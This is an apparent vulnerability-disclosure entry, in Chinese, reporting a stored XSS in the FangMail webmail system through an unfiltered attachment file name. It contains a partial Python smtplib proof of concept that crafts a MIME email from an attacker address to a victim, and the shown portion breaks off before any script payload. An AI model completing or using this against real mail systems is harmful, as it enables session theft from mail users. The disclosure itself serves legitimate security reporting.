FangMail又一处储存型XSS

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 又一处 ### 详细说明: 附件文件名处未过滤,可触发XSS 假设攻击者为attack@attack.com,受害者为victim@victim.com ``` import smtplib import base64 sender = 'attack@attack.com' reciever = 'victim@victim.com' message = """From: <test> <attack@attack.com> To: <test> <victim@victim.com> Subject: Test MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=\"YOUAREUNDERATTACK\" --YOUAREUNDERATTACK Content-Type: multipart/alternative; boundary=\"YOUAREUNDERATTACK\" --YOUAREUNDERATTACK Content-Type: text/plain; charset=GBK Content-Transfer-Encoding: base64 IFlvdSBhcmUgdW5kZXIgYXR0YWNrLgoKCg== --YOUAREUNDERATTACK Content-Type: text/html; charset=GBK Content-Transfer-Encoding: base64 PGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6MS43O2NvbG9yOiMwMDAwMDA7Zm9udC1zaXplOjE0cHg7 Zm9udC1mYW1pbHk6YXJpYWwiPjxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OjEuNztjb2xvcjojMDAw MDAwO2ZvbnQtc2l6ZToxNHB4O2ZvbnQtZmFtaWx5OmFyaWFsIj4mbmJzcDtZb3UgYXJlIHVuZGVy IGF0dGFjay48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBp...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息